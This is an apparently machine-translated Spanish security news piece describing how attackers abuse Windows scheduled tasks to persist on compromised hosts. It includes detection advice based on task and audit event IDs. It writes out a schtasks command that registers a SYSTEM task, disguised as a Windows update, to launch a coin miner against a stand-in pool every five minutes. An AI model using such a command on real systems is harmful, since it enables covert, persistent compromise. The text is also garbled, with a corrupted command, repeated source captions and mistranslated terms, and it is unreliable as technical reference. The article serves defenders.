Durante el año pasado, los equipos de seguridad han observado un aumento en los adversarios que aprovechan las tareas programadas de ventanas nativas para mantener el punto de apoyo en entornos comprometidos.
A diferencia de los raíces elaboradas o las exploits de día cero, estas técnicas explotan la funcionalidad del sistema incorporado, lo que permite a los actores de amenaza persistir sin implementar binarios adicionales o cadenas de herramientas complejas.
Al integrar los comandos maliciosos directamente en los trabajos del programador de tareas, activados en el arranque, el inicio del inicio o a los intervalos cronometrados, los ataques logran un acceso sigiloso y resistente que a menudo elude los mecanismos de detección convencionales.
Las infecciones iniciales generalmente comienzan con correos electrónicos de phishing o kits de explotación que ofrecen cargadores livianos que giran rápidamente a la persistencia.
Una vez que logran la ejecución en el punto final, los atacantes invocan los cmdlets binarios schtasks.exe o Powershell para registrar nuevas tareas o modificar las existentes. Estos trabajos pueden ejecutarse bajo la cuenta del sistema, lo que complica aún más la detección.
Las primeras muestras se dirigieron a instituciones financieras, mientras que las campañas más recientes se han expandido a sectores de infraestructura crítica, destacando la amplia aplicabilidad y el bajo costo operativo del abuso de tareas programadas.
Los analistas spot de DFIR anotado La dependencia del malware de los desencadenantes como LogonTrigger y Timetrigger, configurado para ejecutar cada cinco minutos o al inicio de sesión de cada usuario.
En múltiples compromisos, los equipos de respuesta a incidentes descubrieron tareas nombradas para imitar los servicios legítimos de Windows, como “TelemetryUpdater” o “HealthCheck”, pero apuntando a ejecutables almacenados en directorios no convencionales bajo C: \ ProgramData \ System.
Este enfoque permite que los componentes maliciosos se mezclen con la actividad del sistema de rutina, retrasando el análisis y la remediación.
Las cargas útiles posteriores entregadas a través de estas tareas van desde binarios de minería de monedas hasta herramientas de administración remota.
Una vez registradas, las tareas a menudo se actualizan al invocar scripts de PowerShell que extraen módulos adicionales o cambian los argumentos de la línea de comandos.
Debido a que los atacantes pueden eliminar o deshabilitar los registros de programadores de tareas, muchas organizaciones han luchado por reconstruir líneas de tiempo sin telemetría EDR enriquecida.
Tácticas de persistencia: registro y ejecución de tareas maliciosas
Un mecanismo de persistencia central implica la invocación de la línea de comandos:-
schtasks /create /sc mind /mo 5 /tn “microsoft \ windows \ update \ telemetryUpdater” \ /tr “c: \ programaData \ system \ svchost32.exe –Url = stratum+tcp: //miner.fakePool.local: 33333 -User Guest” \ /ru Sistema programado Comando de creación de tareas (Source -The Dfir Spot) Dfir Spot) -Source) Spot)
En este fragmento, los parámetros /SC Minute /Mo 5 dictan un intervalo de cinco minutos, mientras que el nombre de la tarea y las estructuras de directorio imitan las actualizaciones auténticas de Windows. Los atacantes con frecuencia eligen elementos Timetrigger en el archivo de tareas XML para especificar tanto los límites de inicio como la repetición indefinida, como en:
2025-08-17T00: 00: 00 PT5M Configuración de XML de tarea falsa falsa (fuente-el lugar DFIR)
Después de la creación, el trabajo se ejecuta con privilegios del sistema, lanzando un cargador que contacta un repositorio remoto C2 o carga útil.
Al integrar el ejecutable en rutas no estándar y abusar de las características de programación nativa, los actores de amenaza logran persistencia sin requerir marcos de explotación adicionales.
Las estrategias de detección deben incluir la base rigurosa de las tareas programadas legítimas, el monitoreo de tareas de tareas/registros operativos para el ID de eventos 106 (tarea registrada) y la aplicación de las políticas de auditoría avanzada para capturar entradas de ID de evento 4698.
La combinación de estos registros con análisis de linaje de proceso impulsado por EDR puede revelar patrones de creación de tareas anómalos que divergen de las operaciones administrativas normales.
Aumente su SOC y ayude a su equipo a proteger su negocio con inteligencia gratuita de amenazas de primer nivel: Solicitar prueba de prueba premium de búsqueda TI.
